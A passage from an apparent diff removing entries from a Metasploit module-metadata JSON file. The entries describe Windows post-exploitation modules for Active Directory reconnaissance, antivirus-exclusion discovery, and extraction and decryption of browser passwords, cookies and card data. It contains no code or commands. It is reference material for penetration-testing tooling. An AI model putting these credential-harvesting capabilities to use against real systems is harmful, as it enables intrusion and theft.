group.", - "references": [ - "URL-https://www.netspi.com/blog/entryid/214/faster-domain-escalation-using-ldap" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ad_service_principal_names.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ad_service_principal_names", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ad_to_wordlist": { - "name": "Windows Active Directory Wordlist Builder", - "fullname": "post/windows/gather/enum_ad_to_wordlist", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Thomas Ring" - ], - "description": "This module will gather information from the default Active Domain (AD) directory\n and use these words to seed a wordlist. 
By default it enumerates user accounts to\n build the wordlist.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ad_to_wordlist.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ad_to_wordlist", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ad_user_comments": { - "name": "Windows Gather Active Directory User Comments", - "fullname": "post/windows/gather/enum_ad_user_comments", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell " - ], - "description": "This module will enumerate user accounts in the default Active Domain (AD) directory which\n contain 'pass' in their description or comment (case-insensitive) by default. 
In some cases,\n such users have their passwords specified in these fields.", - "references": [ - "URL-http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ad_user_comments.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ad_user_comments", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ad_users": { - "name": "Windows Gather Active Directory Users", - "fullname": "post/windows/gather/enum_ad_users", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell ", - "Carlos Perez ", - "Stuart Morgan " - ], - "description": "This module will enumerate user accounts in the default Active Domain (AD) directory and stores\n them in the database. If GROUP_MEMBER is set to the DN of a group, this will list the members of\n that group by performing a recursive/nested search (i.e. 
it will list users who are members of\n groups that are members of groups that are members of groups (etc) which eventually include the\n target group DN.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ad_users.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ad_users", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_applications": { - "name": "Windows Gather Installed Application Enumeration", - "fullname": "post/windows/gather/enum_applications", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will enumerate all installed applications on a Windows system", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_applications.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_applications", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_artifacts": { - "name": "Windows Gather File and Registry Artifacts Enumeration", - "fullname": "post/windows/gather/enum_artifacts", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "averagesecurityguy " - ], - 
"description": "This module will check the file system and registry for particular artifacts.\n\n The list of artifacts is read in YAML format from data/post/enum_artifacts_list.txt\n or a user specified file. Any matches are written to the loot.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-08-07 16:01:45 +0000", - "path": "/modules/post/windows/gather/enum_artifacts.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_artifacts", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "powershell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_av": { - "name": "Windows Installed AntiVirus Enumeration", - "fullname": "post/windows/gather/enum_av", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "rageltman " - ], - "description": "This module will enumerate the AV products detected by WMIC", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-04-21 11:35:33 +0000", - "path": "/modules/post/windows/gather/enum_av.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_av", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_av_excluded": { - "name": "Windows Antivirus Exclusions Enumeration", - "fullname": "post/windows/gather/enum_av_excluded", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - 
"author": [ - "Andrew Smith", - "Jon Hart " - ], - "description": "This module will enumerate the file, directory, process and\n extension-based exclusions from supported AV products, which\n currently includes Microsoft Defender, Microsoft Security\n Essentials/Antimalware, and Symantec Endpoint Protection.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_av_excluded.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_av_excluded", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_browsers": { - "name": "Advanced Browser Data Extraction for Chromium and Gecko Browsers", - "fullname": "post/windows/gather/enum_browsers", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Alexander \"xaitax\" Hagenah" - ], - "description": "This post-exploitation module extracts sensitive browser data from both Chromium-based and Gecko-based browsers\n on the target system. 
It supports the decryption of passwords and cookies using Windows Data Protection API (DPAPI)\n and can extract additional data such as browsing history, keyword search history, download history, autofill data,\n credit card information, browser cache and installed extensions.", - "references": [], - "platform": "Windows", - "arch": "x64, x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-10-30 15:43:02 +0000", - "path": "/modules/post/windows/gather/enum_browsers.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_browsers", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_chocolatey_applications": { - "name": "Windows Gather Installed Application Within Chocolatey Enumeration", - "fullname": "post/windows/gather/enum_chocolatey_applications", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Nick Cottrell " - ], - "description": "This module will enumerate all installed applications on a Windows system with chocolatey installed", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-04-01 10:56:11 +0000", - "path": "/modules/post/windows/gather/enum_chocolatey_applications.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_chocolatey_applications", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - 
}, - "post_windows/gather/enum_chrome": { - "name": "Windows Gather Google Chrome User Data Enumeration", - "fullname": "post/windows/gather/enum_chrome", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Sven Taute", - "sinn3r ", - "Kx499", - "mubix " - ], - "description": "This module will collect user data from Google Chrome and attempt to decrypt\n sensitive information.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_chrome.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_chrome", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_computers": { - "name": "Windows Gather Enumerate Computers", - "fullname": "post/windows/gather/enum_computers", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Joshua Abraham " - ], - "description": "This module will enumerate computers included in the primary Active Directory domain.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-10-12 10:59:29 +0000", - "path": "/modules/post/windows/gather/enum_computers.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_computers", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - 
"post_windows/gather/enum_db": { - "name": "Windows Gather Database Instance Enumeration", - "fullname": "post/windows/gather/enum_db", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Barry Shteiman ", - "juan vazquez " - ], - "description": "This module will enumerate a Windows system for installed database instances.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_db.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_db", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_devices": { - "name": "Windows Gather Hardware Enumeration", - "fullname": "post/windows/gather/enum_devices", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Brandon Perry " - ], - "description": "Enumerate PCI hardware information from the registry. Please note this script\n will run through registry subkeys such as: 'PCI', 'ACPI', 'ACPI_HAL', 'FDC', 'HID',\n 'HTREE', 'IDE', 'ISAPNP', 'LEGACY'', LPTENUM', 'PCIIDE', 'SCSI', 'STORAGE', 'SW',\n and 'USB'; it will take time to finish. 
It is recommended to run this module as a\n background job.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_devices.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_devices", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_dirperms": { - "name": "Windows Gather Directory Permissions Enumeration", - "fullname": "post/windows/gather/enum_dirperms", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kx499", - "Ben Campbell ", - "sinn3r " - ], - "description": "This module enumerates directories and lists the permissions set\n on found directories. 
Please note: if the PATH option isn't specified,\n then the module will start enumerate whatever is in the target machine's\n %PATH% variable.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_dirperms.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_dirperms", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_domain": { - "name": "Windows Gather Enumerate Domain", - "fullname": "post/windows/gather/enum_domain", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Joshua Abraham " - ], - "description": "This module identifies the primary Active Directory domain name\n and domain controller.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-08 13:35:22 +0000", - "path": "/modules/post/windows/gather/enum_domain.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_domain", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "shell", - "powershell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_domain_group_users": { - "name": "Windows Gather Enumerate Domain Group", - "fullname": "post/windows/gather/enum_domain_group_users", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "Stephen Haywood " - ], - 
"description": "This module extracts user accounts from the specified domain group\n and stores the results in the loot. It will also verify if session\n account is in the group. Data is stored in loot in a format that\n is compatible with the token_hunter plugin. This module must be\n run on a session running as a domain user.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-22 17:05:19 +0000", - "path": "/modules/post/windows/gather/enum_domain_group_users.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_domain_group_users", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_domain_tokens": { - "name": "Windows Gather Enumerate Domain Tokens", - "fullname": "post/windows/gather/enum_domain_tokens", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module enumerates domain account tokens, processes running under\n domain accounts, and domain users in the local Administrators, Users\n and Backup Operator groups.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-10 13:54:39 +0000", - "path": "/modules/post/windows/gather/enum_domain_tokens.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_domain_tokens", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - 
"post_windows/gather/enum_domain_users": { - "name": "Windows Gather Enumerate Active Domain Users", - "fullname": "post/windows/gather/enum_domain_users", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Etienne Stalmans ", - "Ben Campbell " - ], - "description": "This module will enumerate computers included in the primary Domain and attempt\n to list all locations the targeted user has sessions on. If the HOST option is specified\n the module will target only that host. If the HOST is specified and USER is set to nil, all users\n logged into that host will be returned.'", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_domain_users.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_domain_users", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_domains": { - "name": "Windows Gather Domain Enumeration", - "fullname": "post/windows/gather/enum_domains", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix " - ], - "description": "This module enumerates currently the domains a host can see and the domain\n controllers for each domain.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_domains.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_domains", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { 
- "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_emet": { - "name": "Windows Gather EMET Protected Paths", - "fullname": "post/windows/gather/enum_emet", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "vysec " - ], - "description": "This module will enumerate the EMET protected paths on the target host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_emet.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_emet", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_files": { - "name": "Windows Gather Generic File Collection", - "fullname": "post/windows/gather/enum_files", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "3vi1john ", - "RageLtMan " - ], - "description": "This module downloads files recursively based on the FILE_GLOBS option.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_files.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_files", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - 
"actions": [] - }, - "post_windows/gather/enum_hostfile": { - "name": "Windows Gather Windows Host File Enumeration", - "fullname": "post/windows/gather/enum_hostfile", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "vt " - ], - "description": "This module returns a list of entries in the target system's hosts file.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_hostfile.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_hostfile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_hyperv_vms": { - "name": "Windows Hyper-V VM Enumeration", - "fullname": "post/windows/gather/enum_hyperv_vms", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "gwillcox-r7" - ], - "description": "This module will check if the target machine is a Hyper-V host and, if it is, will return a list of all\n of the VMs running on the host, as well as stats such as their state, version, CPU Usage, uptime, and status.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/post/windows/gather/enum_hyperv_vms.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_hyperv_vms", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - 
"needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ie": { - "name": "Windows Gather Internet Explorer User Data Enumeration", - "fullname": "post/windows/gather/enum_ie", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kx499" - ], - "description": "This module will collect history, cookies, and credentials (from either HTTP\n auth passwords, or saved form passwords found in auto-complete) in\n Internet Explorer. The ability to gather credentials is only supported\n for versions of IE >=7, while history and cookies can be extracted for all\n versions.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ie.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ie", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_logged_on_users": { - "name": "Windows Gather Logged On User Enumeration (Registry)", - "fullname": "post/windows/gather/enum_logged_on_users", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will enumerate current and recently logged on Windows users.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-08-08 01:50:36 +0000", - "path": "/modules/post/windows/gather/enum_logged_on_users.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_logged_on_users", - "check": false, - "post_auth": false, - "default_credential": false, - 
"notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "powershell", - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ms_product_keys": { - "name": "Windows Gather Product Key", - "fullname": "post/windows/gather/enum_ms_product_keys", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Brandon Perry " - ], - "description": "This module will enumerate Microsoft product license keys.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-08-21 16:00:27 +0000", - "path": "/modules/post/windows/gather/enum_ms_product_keys.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ms_product_keys", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_muicache": { - "name": "Windows Gather Enum User MUICache", - "fullname": "post/windows/gather/enum_muicache", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "TJ Glad " - ], - "description": "This module gathers information about the files and file paths that logged on users have\n executed on the system. It also will check if the file still exists on the system. This\n information is gathered by using information stored under the MUICache registry key. If\n the user is logged in when the module is executed it will collect the MUICache entries\n by accessing the registry directly. 
If the user is not logged in the module will download\n users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are\n parsed from the downloaded hive.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_muicache.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_muicache", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_onedrive": { - "name": "OneDrive Sync Provider Enumeration Module", - "fullname": "post/windows/gather/enum_onedrive", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan " - ], - "description": "This module will identify the Office 365 OneDrive endpoints for both business and personal accounts\n across all users (providing access is permitted). 
It is useful for identifying document libraries\n that may otherwise not be obvious which could contain sensitive or useful information.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/post/windows/gather/enum_onedrive.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_onedrive", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_patches": { - "name": "Windows Gather Applied Patches", - "fullname": "post/windows/gather/enum_patches", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "zeroSteiner ", - "mubix " - ], - "description": "This module enumerates patches applied to a Windows system using the\n WMI query: SELECT HotFixID, InstalledOn FROM Win32_QuickFixEngineering.", - "references": [ - "URL-http://msdn.microsoft.com/en-us/library/aa394391(v=vs.85).aspx" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-23 17:41:20 +0000", - "path": "/modules/post/windows/gather/enum_patches.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_patches", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_powershell_env": { - "name": "Windows Gather PowerShell Environment Setting Enumeration", - "fullname": "post/windows/gather/enum_powershell_env", - 
"aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will enumerate Microsoft PowerShell settings.", - "references": [ - "URL-https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies", - "URL-https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-08-01 00:56:21 +0000", - "path": "/modules/post/windows/gather/enum_powershell_env.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_powershell_env", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "shell", - "powershell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_prefetch": { - "name": "Windows Gather Prefetch File Information", - "fullname": "post/windows/gather/enum_prefetch", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "TJ Glad " - ], - "description": "This module gathers prefetch file information from WinXP, Win2k3 and Win7 systems\n and current values of related registry keys. 
From each prefetch file we'll collect\n filetime (converted to utc) of the last execution, file path hash, run count, filename\n and the execution path.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_prefetch.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_prefetch", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_proxy": { - "name": "Windows Gather Proxy Setting", - "fullname": "post/windows/gather/enum_proxy", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix " - ], - "description": "This module pulls a user's proxy settings. 
